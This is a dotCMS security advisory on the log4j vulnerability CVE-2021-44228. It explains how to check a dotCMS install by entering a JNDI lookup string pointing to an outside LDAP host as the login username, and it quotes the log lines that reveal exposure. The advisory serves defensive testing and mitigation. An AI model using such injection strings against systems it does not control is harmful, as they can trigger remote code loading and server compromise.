On Friday 12/10/2021, a critical vulnerability notification (CVE-2021-44228) was released regarding a vulnerability in the log4j library, which is a very common open-source component used by a large number of internet providers, including Apple, Microsoft, Twitter, and Amazon Web Services, and others (for a full list of the extent of this issue, please see https://github.com/YfryTchsGD/Log4jAttackSurface). The log4j component is also used by all recent versions of dotCMS, so this vulnerability has the potential to affect most dotCMS customers.

How to test if dotCMS is vulnerable
Try to log in (native) using the following string as the username:
${jndi:ldap://nope.dotcms.com/exploit}
and any old password.
If you see the following message in dotcms.log OR catalina.out (need to check both on binary installs), or in docker logs, then the site is vulnerable
AsyncAppender-generic WARN Error looking up JNDI resource [ldap://nope.dotcms.com/exploit]. javax.naming.CommunicationException: nope.dotcms.com:389 [Root exception is java.net.UnknownHostException: nope.dotcms.com]

The following message is fine and expected, it does not indicate there is an issue
ERROR ejb.UserManagerImpl - Invalid email throwing a UserEmailAddressException: ${jndi:ldap://nope.dotcms.com/exploit}

dotCMS has already created updated versions of dotCMS software and configuration to mitigate this vulnerability for all affected dotCMS versions, and has already applied mitigations for this issue to all dotCMS Cloud customers.

Please see https://github.com/dotCMS/core/issues/21393 for more information on how to mitigate your dotCMS environment.

Github Issue Link:
https://github.com/dotCMS/core/issues/21393